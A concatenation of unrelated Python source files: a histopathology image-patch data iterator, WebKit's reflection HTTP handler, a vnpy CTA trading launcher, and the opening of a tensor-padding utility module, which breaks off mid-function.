for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
return x
def process_image_pipeline_img(tup):
""" Worker function for DirectoryIterator multiprocessing.Pool
"""
(pipeline,batch_generator, grayscale,
target_size, dim_ordering, rng) = tup
x = batch_generator[0].astype(np.float32)
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
if batch_generator[1] == "normal" or batch_generator[1] == "normal_hard" or batch_generator[1] == "normal_hard2" or batch_generator[1] == 'normal_hard_black' or batch_generator[1] == 'normal_hard_dim' or batch_generator[1] == 'normal_hard3':
y=0
if batch_generator[1] == "tumor" or batch_generator[1] == 'tumor_hard':
y=1
# elif batch_generator[1] == "lymphocyte" :
# y=0
return x , y
########################################
# Functions for filtering
########################################
def extract_foreground_mask(img):
'''
Extract the slide foreground as the binary mask 255 or 0
threshold -> dilate -> threshold
Input:
slide: h*w*3 array, the downsampled slide image
Output:
gray_t: h*w array, the foreground is labeled 255 and the other region is labeled 0
'''
threshold = 0.8
dilate_kernel = 2
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (dilate_kernel, dilate_kernel))
# Convert color space
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
ret, gray_t = cv2.threshold(gray, threshold * 255, 255, cv2.THRESH_BINARY_INV)
gray_t = cv2.dilate(gray_t, kernel)
ret, gray_t = cv2.threshold(gray_t, threshold * 255, 255, cv2.THRESH_BINARY)
return gray_t
def process_bgs(img):
img_binary = extract_foreground_mask(img)
img_thresh = img_binary
return img_thresh
## TODO: cut a patch from the given image, location=(x,y), target_size=(w,h)
def process_image_pipeline_json(tup):
(pipeline, patch_meta, grayscale,
target_size, dim_ordering, rng) = tup  # the randomness at the same position within each batch is identical
fname = patch_meta["img_path"]
fmaskname = patch_meta["mask_path"]
fstatus = patch_meta["label"]
nb_crop = 7
threshold = 0.5
# return x and y
# A tumor patch or a normal patch?
# If it is a tumor patch:
if fstatus == "tumor":
# Load img and corresponding mask.
if fname.startswith('/disk1'):
fname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/tumor/' + os.path.basename(fname)
if fmaskname.startswith('/disk1'):
fmaskname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/mask/' + os.path.basename(fmaskname)
img_original = load_img(fname,
grayscale=grayscale,
target_size=None)
mask_original = load_img(fmaskname,
grayscale=grayscale,
target_size=None)
# mask_verify = np.array(mask)
# mask_np = mask_verify[:, :, 0]
# Check the size of the image:
width = img_original.size[0]
height = img_original.size[1]
# if the image is larger than target size
if (width > target_size[0]) and (height > target_size[1]):
for i in range(nb_crop):
# 1. Get random coordinate
loc_x = width - target_size[0]
loc_y = height - target_size[1]
get_x = random.randint(0, loc_x - 1)
get_y = random.randint(0, loc_y - 1)
# 2. Crop the image
img = img_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
x = img_to_array(img, dim_ordering=dim_ordering)
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
# 2.5 Check the ratio of white pixels in the image
img_thresh = process_bgs(img=img_to_array(img, dim_ordering=dim_ordering))
total_pixel_m = float(img_thresh.shape[0] * img_thresh.shape[1])
nb_foreground = float(np.count_nonzero(img_thresh))
foreground_ratio = float(nb_foreground / total_pixel_m)
# 3. Crop the mask
get_mask = mask_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
get_mask = img_to_array(get_mask, dim_ordering=dim_ordering)
# 4. Calculate mask label
total_pixel = float(get_mask.shape[0] * get_mask.shape[1])
tumor_pixel = float(np.count_nonzero(get_mask[:, :, 0]))
tumor_rate = float(tumor_pixel / total_pixel)
if (tumor_rate >= threshold) and (foreground_ratio >= threshold):
y = 1
return x, y
elif ((tumor_rate < threshold) or (foreground_ratio < threshold)) and (i < (nb_crop-1)):
continue
elif ((tumor_rate < threshold) or (foreground_ratio < threshold)) and (i == (nb_crop-1)):
y = 0
return x, y
# If the image is already smaller than target, there should be sth wrong
else:
print ("Error! Patch size smaller that target!")
# If it is a normal patch
elif fstatus == "lymphocyte":
# Load img and corresponding mask.
if fname.startswith('/disk1'):
fname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/tumor/' + os.path.basename(fname)
if fmaskname.startswith('/disk1'):
fmaskname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/mask/' + os.path.basename(fmaskname)
img_original = load_img(fname,
grayscale=grayscale,
target_size=None)
mask_original = load_img(fmaskname,
grayscale=grayscale,
target_size=None)
# mask_verify = np.array(mask)
# mask_np = mask_verify[:, :, 0]
# Check the size of the image:
width = img_original.size[0]
height = img_original.size[1]
# if the image is larger than target size
if (width > target_size[0]) and (height > target_size[1]):
for i in range(nb_crop):
# 1. Get random coordinate
loc_x = width - target_size[0]
loc_y = height - target_size[1]
get_x = random.randint(0, loc_x - 1)
get_y = random.randint(0, loc_y - 1)
# 2. Crop the image
img = img_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
x = img_to_array(img, dim_ordering=dim_ordering)
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
# 2.5 Check the ratio of white pixels in the image
img_thresh = process_bgs(img=img_to_array(img, dim_ordering=dim_ordering))
total_pixel_m = float(img_thresh.shape[0] * img_thresh.shape[1])
nb_foreground = float(np.count_nonzero(img_thresh))
foreground_ratio = float(nb_foreground / total_pixel_m)
# 3. Crop the mask
get_mask = mask_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
get_mask = img_to_array(get_mask, dim_ordering=dim_ordering)
# 4. Calculate mask label
total_pixel = float(get_mask.shape[0] * get_mask.shape[1])
lymphocyte_pixel = float(np.count_nonzero(get_mask[:, :, 0]))
lymphocyte_rate = float(lymphocyte_pixel / total_pixel)
if (lymphocyte_rate >= threshold) and (foreground_ratio >= threshold):
y = 0
return x, y
elif ((lymphocyte_rate < threshold) or (foreground_ratio < threshold)) and (i < (nb_crop-1)):
continue
elif ((lymphocyte_rate < threshold) or (foreground_ratio < threshold)) and (i == (nb_crop-1)):
y = 0
return x, y
# If the image is already smaller than target, there should be sth wrong
else:
print ("Error! Patch size smaller that target!")
# if fname.startswith('/disk1'):
# fname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/normal/' + os.path.basename(fname)
# img_original = load_img(fname,
# grayscale=grayscale,
# target_size=None)
# # The label for a normal patch must be zero
# y = 0
# # Check the size of the image:
# width = img_original.size[0]
# height = img_original.size[1]
# # If the image is larger than target, random crop
# if (width > target_size[0]) and (height > target_size[1]):
# for i in range(nb_crop):
# loc_x = width - target_size[0]
# loc_y = height - target_size[1]
# get_x = random.randint(0, loc_x - 1)
# get_y = random.randint(0, loc_y - 1)
# img = img_original.crop((get_x, get_y,
# get_x + target_size[0],
# get_y + target_size[1]))
# # Img to array and use the functions in pipeline for augmentation
# x = img_to_array(img, dim_ordering=dim_ordering)
# for (func, kwargs) in pipeline:
# x = func(x, rng=rng, **kwargs)
# # Check the ratio of white pixels in the image
# img_thresh = process_bgs(img=img_to_array(img, dim_ordering=dim_ordering))
# total_pixel_m = float(img_thresh.shape[0] * img_thresh.shape[1])
# nb_foreground = float(np.count_nonzero(img_thresh))
# foreground_ratio = float(nb_foreground / total_pixel_m)
# if (foreground_ratio >= threshold):
# return x, y
# elif (foreground_ratio < threshold) and (i < (nb_crop-1)):
# continue
# elif (foreground_ratio < threshold) and (i == (nb_crop-1)):
# return x, y
else:
print("Error! Patch size smaller than target!")
return x, y
class NumpyArrayIterator(Iterator):
def __init__(self, x, y, image_data_generator,
batch_size=32, shuffle=False, seed=None,
dim_ordering='default',
save_to_dir=None, save_prefix='', save_format='jpeg',
pool=None):
if y is not None and len(x) != len(y):
raise ValueError('X (images tensor) and y (labels) '
'should have the same length. '
'Found: X.shape = %s, y.shape = %s' %
(np.asarray(x).shape, np.asarray(y).shape))
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.x = np.asarray(x)
if self.x.ndim != 4:
raise ValueError('Input data in `NumpyArrayIterator` '
'should have rank 4. You passed an array '
'with shape', self.x.shape)
channels_axis = 3 if dim_ordering == 'tf' else 1
if self.x.shape[channels_axis] not in {1, 3, 4}:
raise ValueError('NumpyArrayIterator is set to use the '
'dimension ordering convention "' + dim_ordering + '" '
'(channels on axis ' + str(channels_axis) + '), i.e. expected '
'either 1, 3 or 4 channels on axis ' + str(channels_axis) + '. '
'However, it was passed an array with shape ' + str(self.x.shape) +
' (' + str(self.x.shape[channels_axis]) + ' channels).')
if y is not None:
self.y = np.asarray(y)
else:
self.y = None
self.image_data_generator = image_data_generator
self.dim_ordering = dim_ordering
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.pool = pool
super(NumpyArrayIterator, self).__init__(batch_size, shuffle, seed, n=x.shape[0])
def next(self):
# for python 2.x.
# Keeps under lock only the mechanism which advances
# the indexing of each batch
# see http://anandology.com/blog/using-iterators-and-generators/
with self.lock:
index_array, current_index, current_batch_size = next(self.index_generator)
# The transformation of images is not under thread lock
# so it can be done in parallel
batch_x = None
if self.pool:
pipeline = self.image_data_generator.pipeline()
result = self.pool.map(process_image_pipeline, (
(pipeline, self.x[j], self.rngs[i%self.batch_size])
for i, j in enumerate(index_array)))
batch_x = np.array(result)
else:
batch_x = np.zeros(tuple([current_batch_size] + list(self.x.shape)[1:]))
for i, j in enumerate(index_array):
x = self.x[j]
x = self.image_data_generator.random_transform(x.astype('float32'))
x = self.image_data_generator.standardize(x)
batch_x[i] = x
if self.save_to_dir:
for i in range(current_batch_size):
img = array_to_img(batch_x[i], self.dim_ordering, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(prefix=self.save_prefix,
index=current_index + i,
hash=np.random.randint(1e4),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
if self.y is None:
return batch_x
batch_y = self.y[index_array]
return batch_x, batch_y
class DirectoryIterator(Iterator):
def __init__(self, directory, image_data_generator,
target_size=(256, 256), color_mode='rgb',
dim_ordering='default',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_format='jpeg',
follow_links=False, pool=None, save_list_dir=None,
nb_gpu=4, phase="train"):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.directory = directory
self.image_data_generator = image_data_generator
self.target_size = tuple(target_size)
if color_mode not in {'rgb', 'grayscale'}:
raise ValueError('Invalid color mode:', color_mode,
'; expected "rgb" or "grayscale".')
self.color_mode = color_mode
self.dim_ordering = dim_ordering
if self.color_mode == 'rgb':
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (3,)
else:
self.image_shape = (3,) + self.target_size
else:
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (1,)
else:
self.image_shape = (1,) + self.target_size
self.classes = classes
if class_mode not in {'categorical', 'binary', 'sparse', None}:
raise ValueError('Invalid class_mode:', class_mode,
'; expected one of "categorical", '
'"binary", "sparse", or None.')
self.class_mode = class_mode
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.pool = pool
self.batch_size = batch_size
self.nb_gpu = nb_gpu
self.save_list_dir = save_list_dir
self.phase = phase
white_list_formats = {'png', 'jpg', 'jpeg', 'bmp'}
# first, count the number of samples and classes
# self.nb_sample = 0
self.nb_sample_init = 0
if not classes:
classes = []
for subdir in sorted(os.listdir(directory)):
if os.path.isdir(os.path.join(directory, subdir)):
classes.append(subdir)
self.nb_class = len(classes)
self.class_indices = dict(zip(classes, range(len(classes))))
def _recursive_list(subpath):
return sorted(os.walk(subpath, followlinks=follow_links), key=lambda tpl: tpl[0])
for subdir in classes:
subpath = os.path.join(directory, subdir)
for root, _, files in _recursive_list(subpath):
for fname in files:
is_valid = False
for extension in white_list_formats:
if fname.lower().endswith('.' + extension):
is_valid = True
break
if is_valid:
self.nb_sample_init += 1
print ("Using this processing code...")
print('Found %d images belonging to %d classes.' % (self.nb_sample_init, self.nb_class))
# second, build an index of the images in the different class subfolders
self.filenames = []
self.classes = np.zeros((self.nb_sample_init,), dtype='int32')
i = 0
for subdir in classes:
subpath = os.path.join(directory, subdir)
for root, _, files in _recursive_list(subpath):
for fname in files:
is_valid = False
for extension in white_list_formats:
if fname.lower().endswith('.' + extension):
is_valid = True
break
if is_valid:
self.classes[i] = self.class_indices[subdir]
i += 1
# add filename relative to directory
absolute_path = os.path.join(root, fname)
self.filenames.append(os.path.relpath(absolute_path, directory))
# Save the list of img_paths when doing the test
print("Current phase:")
print(self.phase)
if self.phase == "test":
files_np = np.array(self.filenames)
np.save(self.save_list_dir, files_np)
print("Image paths list saved for testing!")
# Pop the remainder according to the nb_gpu
multiple = self.nb_gpu * self.batch_size
print("The multiple is: %d" % multiple)
quotient = self.nb_sample_init // multiple
print("Quotient: %d" % quotient)
nb_excess_patch = self.nb_sample_init - quotient * multiple
print("Excess patches: %d" % nb_excess_patch)
self.nb_sample = self.nb_sample_init - nb_excess_patch
# Deal with excess patches
if nb_excess_patch == 0:
print("There is no excessing patches.")
else:
for i in range(nb_excess_patch):
self.classes = np.delete(self.classes, -1)
self.filenames.pop(-1)
# print("Lenth of the patch meta: %d" % len(self.patch_meta))
print("[!] After pop the total number of patches is %d" % self.nb_sample)
super(DirectoryIterator, self).__init__(batch_size, shuffle, seed, n=self.nb_sample)
def next(self):
with self.lock:
index_array, current_index, current_batch_size = next(self.index_generator)
# The transformation of images is not under thread lock
# so it can be done in parallel
batch_x = None
grayscale = self.color_mode == 'grayscale'
if self.pool:
pipeline = self.image_data_generator.pipeline()
result = self.pool.map(process_image_pipeline_dir, ((pipeline,
self.filenames[j],
self.directory,
grayscale,
self.target_size,
self.dim_ordering,
self.rngs[i%self.batch_size]) for i, j in enumerate(index_array)))
batch_x = np.array(result)
else:
batch_x = np.zeros((current_batch_size,) + self.image_shape)
# build batch of image data
for i, j in enumerate(index_array):
fname = self.filenames[j]
img = load_img(os.path.join(self.directory, fname),
grayscale=grayscale,
target_size=self.target_size)
x = img_to_array(img, dim_ordering=self.dim_ordering)
x = self.image_data_generator.random_transform(x)
x = self.image_data_generator.standardize(x)
batch_x[i] = x
# optionally save augmented images to disk for debugging purposes
# if self.save_to_dir:
# for i in range(current_batch_size):
# img = array_to_img(batch_x[i], self.dim_ordering, scale=True)
# fname = '{prefix}_{index}_{hash}.{format}'.format(prefix=self.save_prefix,
# index=current_index + i,
# hash=np.random.randint(1e4),
# format=self.save_format)
# img.save(os.path.join(self.save_to_dir, fname))
# build batch of labels
if self.class_mode == 'sparse':
batch_y = self.classes[index_array]
elif self.class_mode == 'binary':
batch_y = self.classes[index_array].astype('float32')
elif self.class_mode == 'categorical':
batch_y = np.zeros((len(batch_x), self.nb_class), dtype='float32')
for i, label in enumerate(self.classes[index_array]):
batch_y[i, label] = 1.
else:
return batch_x
return batch_x, batch_y
##############################
# TODO: follow the implementation of DirectoryIterator
##############################
class JsonIterator(Iterator,RandomCrop):
def __init__(self, json_file_path, image_data_generator,
target_size=(256, 256), color_mode='rgb',
dim_ordering='default',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_format='jpeg',
follow_links=False, pool=None, nb_gpu=4, is_training=True):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.json_file_path = json_file_path
self.image_data_generator = image_data_generator
self.target_size = tuple(target_size)
if color_mode not in {'rgb', 'grayscale'}:
raise ValueError('Invalid color mode:', color_mode,
'; expected "rgb" or "grayscale".')
self.color_mode = color_mode
self.dim_ordering = dim_ordering
if self.color_mode == 'rgb':
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (3,)
else:
self.image_shape = (3,) + self.target_size
else:
if self.dim_ordering == 'tf':
self.image_shape = self.target_size + (1,)
else:
self.image_shape = (1,) + self.target_size
self.classes = classes
if class_mode not in {'categorical', 'binary', 'sparse', None}:
raise ValueError('Invalid class_mode:', class_mode,
'; expected one of "categorical", '
'"binary", "sparse", or None.')
self.class_mode = class_mode
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.pool = pool
self.batch_size = batch_size
self.nb_gpu = nb_gpu
# TODO: load pre-processed patches into patch_meta (Finished)
# self.total = []
# self.patch_meta_tumor = []
# self.patch_meta_normal_mucosa=[]
global logger
logger = logging.getLogger(__name__)
enum = threading.enumerate()
logger.info('============before, num of threads is:===========')
logger.info(len(enum))
# set parameters
# labels = ['normal_hard_black', 'normal_hard_dim', 'normal_hard3', 'normal_hard2', 'normal_hard', 'normal', 'tumor_hard', 'tumor']
labels = ['normal', 'tumor']
json_file_path=self.json_file_path
# nb_per_class = [1, 1, 6, 10, 15, 15, 16, 32]
# foreground_rate_per_class = [0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.7, 0.7]
nb_per_class = [16, 16]
foreground_rate_per_class = [0.1, 0.7]
# pdb.set_trace()
objs, nb_samples_per_epoch = Iterator.get_instance_objects(train_base_path=json_file_path,
eval_base_path=json_file_path,
labels=labels,
nb_per_class=nb_per_class,
foreground_rate_per_class=foreground_rate_per_class,
is_training=is_training,
is_shuffle=True,
crop_width=224,
crop_height=224,
readers=1,
num_threads=32,
info_maxsize=10,
data_maxsize=10)
logger.info('*********nb_samples_per_epoch: {}**********' .format(nb_samples_per_epoch))
print('*********nb_samples_per_epoch: {}**********' .format(nb_samples_per_epoch))
self.batch_generator = Iterator.image_data_generator(objs, sum(nb_per_class))
enum = threading.enumerate()
        logger.info('============after, num of threads is:===========')
logger.info(len(enum))
self.stop_training = False
        if self.stop_training:
end_subthreads(objs)
# count the numbers of threads after task is done
enum = threading.enumerate()
print("done")
super(JsonIterator, self).__init__(batch_size, shuffle, seed)
#TODO: use this function to generate batch of image data: batch_x and label: batch_y
def next(self):
grayscale = self.color_mode == 'grayscale'
# a=time.time()
batch_generator = next(self.batch_generator)
random.shuffle(batch_generator)
#TODO: implement process_image_pipeline_json, this function takes input of filenames
if self.pool:
pipeline = self.image_data_generator.pipeline()
# map function: use the "process_image_pipeline_json" function to process the second term
results = self.pool.map(process_image_pipeline_img,
((pipeline,
                                      image_labels,  # TODO: change to index_array_neg(j)
grayscale,
self.target_size,
self.dim_ordering,
self.rngs[index%(self.batch_size)]) for index, image_labels in enumerate(batch_generator)))
results_normal_np = np.asarray(results)
nb_sample = results_normal_np.shape[0]
#TODO: get the X and Y from results ()
batch_x = np.asarray(results_normal_np[:, 0])
batch_y = np.asarray(results_normal_np[:, 1])
new_batch_x = []
new_batch_y = []
            for i in range(nb_sample):
new_batch_x.append(batch_x[i])
new_batch_y.append(batch_y[i])
new_batch_x = np.array(new_batch_x) #(224,224,3)*56
new_batch_y = np.array(new_batch_y)
new_batch_y = np.reshape(new_batch_y, (nb_sample, 1))
# new_batch_y = keras.utils.to_categorical(new_batch_y,2)
# print(new_batch_y)
# print (new_batch_x.shape)
# print (new_batch_y.shape)
# print ("Value of y: ")
# print (batch_y)
        else:
            # The non-pool branch was never implemented: new_batch_x / new_batch_y are not
            # built here, so fail explicitly instead of hitting a NameError at the return below.
            raise NotImplementedError('JsonIterator.next() currently requires a worker pool.')
# optionally save augmented images to disk for debugging purposes
"""
if self.save_to_dir:
for i in range(current_batch_size):
img = array_to_img(batch_x[i], self.dim_ordering, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(prefix=self.save_prefix,
index=current_index + i,
hash=np.random.randint(1e4),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
"""
# build batch of labels
"""
if self.class_mode == 'sparse':
new_batch_y = self.classes[index_array]
elif self.class_mode == 'binary':
new_batch_y = self.classes[index_array].astype('float32')
elif self.class_mode == 'categorical':
new_batch_y = np.zeros((len(batch_x), self.nb_class), dtype='float32')
for i, label in enumerate(self.classes[index_array]):
new_batch_y[i, label] = 1.
"""
return new_batch_x, new_batch_y
|
reflectionhandler.py
|
# Copyright (c) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import with_statement
try:
import json
except ImportError:
# python 2.5 compatibility
import webkitpy.thirdparty.simplejson as json
import BaseHTTPServer
import cgi
import codecs
import datetime
import fnmatch
import mimetypes
import os
import os.path
import shutil
import threading
import time
import urlparse
import wsgiref.handlers
class ReflectionHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# Subclasses should override.
STATIC_FILE_NAMES = None
STATIC_FILE_DIRECTORY = None
# Setting this flag to True causes the server to send
# Access-Control-Allow-Origin: *
# with every response.
allow_cross_origin_requests = False
def do_GET(self):
self._handle_request()
def do_POST(self):
self._handle_request()
def _read_entity_body(self):
length = int(self.headers.getheader('content-length'))
return self.rfile.read(length)
def _read_entity_body_as_json(self):
return json.loads(self._read_entity_body())
def _handle_request(self):
if "?" in self.path:
path, query_string = self.path.split("?", 1)
self.query = cgi.parse_qs(query_string)
else:
path = self.path
self.query = {}
function_or_file_name = path[1:] or "index.html"
if function_or_file_name in self.STATIC_FILE_NAMES:
self._serve_static_file(function_or_file_name)
return
function_name = function_or_file_name.replace(".", "_")
if not hasattr(self, function_name):
self.send_error(404, "Unknown function %s" % function_name)
return
if function_name[0] == "_":
self.send_error(401, "Not allowed to invoke private or protected methods")
return
function = getattr(self, function_name)
function()
def _serve_static_file(self, static_path):
self._serve_file(os.path.join(self.STATIC_FILE_DIRECTORY, static_path))
def quitquitquit(self):
self._serve_text("Server quit.\n")
# Shutdown has to happen on another thread from the server's thread,
# otherwise there's a deadlock
threading.Thread(target=lambda: self.server.shutdown()).start()
def _send_access_control_header(self):
if self.allow_cross_origin_requests:
self.send_header('Access-Control-Allow-Origin', '*')
def _serve_text(self, text):
self.send_response(200)
self._send_access_control_header()
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(text)
def _serve_json(self, json_object):
self.send_response(200)
self._send_access_control_header()
self.send_header('Content-type', 'application/json')
self.end_headers()
json.dump(json_object, self.wfile)
def _serve_file(self, file_path, cacheable_seconds=0):
if not os.path.exists(file_path):
self.send_error(404, "File not found")
return
with codecs.open(file_path, "rb") as static_file:
self.send_response(200)
self._send_access_control_header()
self.send_header("Content-Length", os.path.getsize(file_path))
mime_type, encoding = mimetypes.guess_type(file_path)
if mime_type:
self.send_header("Content-type", mime_type)
if cacheable_seconds:
expires_time = (datetime.datetime.now() +
datetime.timedelta(0, cacheable_seconds))
expires_formatted = wsgiref.handlers.format_date_time(
time.mktime(expires_time.timetuple()))
self.send_header("Expires", expires_formatted)
self.end_headers()
shutil.copyfileobj(static_file, self.wfile)
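# Editor-added, hedged usage sketch (not part of the original handler): a minimal
# subclass showing how STATIC_FILE_NAMES serves files and how "/status.json" is
# dispatched to status_json() via the "." -> "_" replacement in _handle_request().
# The class name, route and port below are illustrative assumptions only.
class _ExampleReflectionHandler(ReflectionHandler):
    STATIC_FILE_NAMES = frozenset(["index.html"])
    STATIC_FILE_DIRECTORY = os.path.dirname(os.path.abspath(__file__))
    def status_json(self):
        # GET /status.json ends up here and replies with a small JSON document.
        self._serve_json({"ok": True})
def _run_example_server(port=8127):
    # Illustrative only: serve _ExampleReflectionHandler on localhost.
    httpd = BaseHTTPServer.HTTPServer(("127.0.0.1", port), _ExampleReflectionHandler)
    httpd.serve_forever()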
|
runCtaTrading.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import futuGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
#----------------------------------------------------------------------
def runChildProcess():
    """Child process run function."""
print('-'*20)
    # Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(futuGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
def process_error(event):
error = event.dict_['data']
le.error(error.errorMsg)
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, process_error)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
me.connect('FUTU')
le.info(u'连接CTP接口')
    sleep(5)  # wait for the CTP interface to initialize
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
le.info(u'CTA策略载入成功')
cta.initAll()
le.info(u'CTA策略初始化成功')
cta.startAll()
le.info(u'CTA策略启动成功')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
    """Parent (daemon) process run function."""
    # Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动CTA策略守护父进程')
    DAY_START = time(8, 45)       # day session start/stop times
    DAY_END = time(15, 30)
    NIGHT_START = time(20, 45)    # night session start/stop times
    NIGHT_END = time(2, 45)
    p = None        # handle of the child process
while True:
currentTime = datetime.now().time()
recording = False
        # Determine which time period we are currently in
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
        # During recording hours, the child process needs to be started
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
        # Outside recording hours, shut the child process down
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess()
    # Although unattended operation is also implemented, it is strongly recommended to check manually at every daily start-up and take responsibility for your own PnL.
#runParentProcess()
|
tensor.py
|
import os.path
from collections import OrderedDict
from contextlib import contextmanager
from typing import Dict, List, Tuple
import subprocess
import time
import numpy as np
import logging
logger = logging.getLogger(__name__)
from torch import Tensor
from torch.cuda.amp import GradScaler, autocast
from torch.multiprocessing import Process
import torch
from paragen.utils.io import TEMP_IO_SAVE_PATH, wait_until_exist
from paragen.utils.ops import recursive
from paragen.utils.runtime import Environment, singleton
def list2tensor(x):
if isinstance(x, Dict):
return {k: list2tensor(v) for k, v in x.items()}
elif isinstance(x, List):
_x = get_example_obj(x)
return create_tensor(x, type(_x))
else:
return x
def convert_idx_to_tensor(idx, pad, ndim=None):
"""
Convert a nd list of indices to a torch tensor
Args:
idx: a nd list of indices
pad: padding index
ndim: dimension for idx
Returns:
- indices in torch tensor
"""
max_lengths = maxlen(idx, ndim=ndim)
tensor_type = type(pad)
ndim = len(max_lengths)
idx = pad_idx(idx, max_lengths, pad, ndim=ndim)
idx = create_tensor(idx, tensor_type)
return idx
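# Editor-added, hedged illustration of convert_idx_to_tensor (never called by this
# module): a ragged 2-d index list is right-padded with `pad` into a rectangular
# LongTensor.  The input values are arbitrary.
def _example_convert_idx_to_tensor():
    idx = [[1, 2, 3], [4, 5]]
    t = convert_idx_to_tensor(idx, pad=0)
    # t is tensor([[1, 2, 3],
    #              [4, 5, 0]]) with dtype torch.int64 (pad type int -> LongTensor)
    return t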
def maxlen(idx, ndim=None):
"""
Compute maxlen tuple from index
Args:
idx: a nd list of indices
ndim: ndim for idx
Returns:
- tensor shape (tuple) of index list
"""
def _max_tuple(tuples: List[Tuple]):
return tuple(max(sizes) for sizes in zip(*tuples))
if ndim is None:
if isinstance(idx, list):
tuples = [maxlen(i) for i in idx]
return (len(idx),) + _max_tuple(tuples)
else:
return tuple()
else:
if ndim > 1:
tuples = [maxlen(i, ndim-1) for i in idx]
return (len(idx),) + _max_tuple(tuples)
else:
return len(idx),
def pad_idx(idx, max_lengths, pad_id, ndim):
"""
Complete index list to a certain shape with padding
Args:
idx: a nd list of indices
max_lengths: n-size tuple defining shape
pad_id: padding index
ndim: dimension for idx
Returns:
- a nd list of indices with padding
"""
if ndim > 1:
l, suff = max_lengths[0], max_lengths[1:]
content = [pad_idx(i, suff, pad_id, ndim-1) for i in idx]
if len(idx) < l:
pad = create_pad((l - len(idx),) + suff, pad_id)
content += pad
return content
else:
return idx + [pad_id for _ in range(max_lengths[0] - len(idx))]
def create_pad(size, pad_id):
"""
Create a padding list of a given size
Args:
size: nd list shape
pad_id: padding index
Returns:
- padding list of the given size
"""
if len(size) == 1:
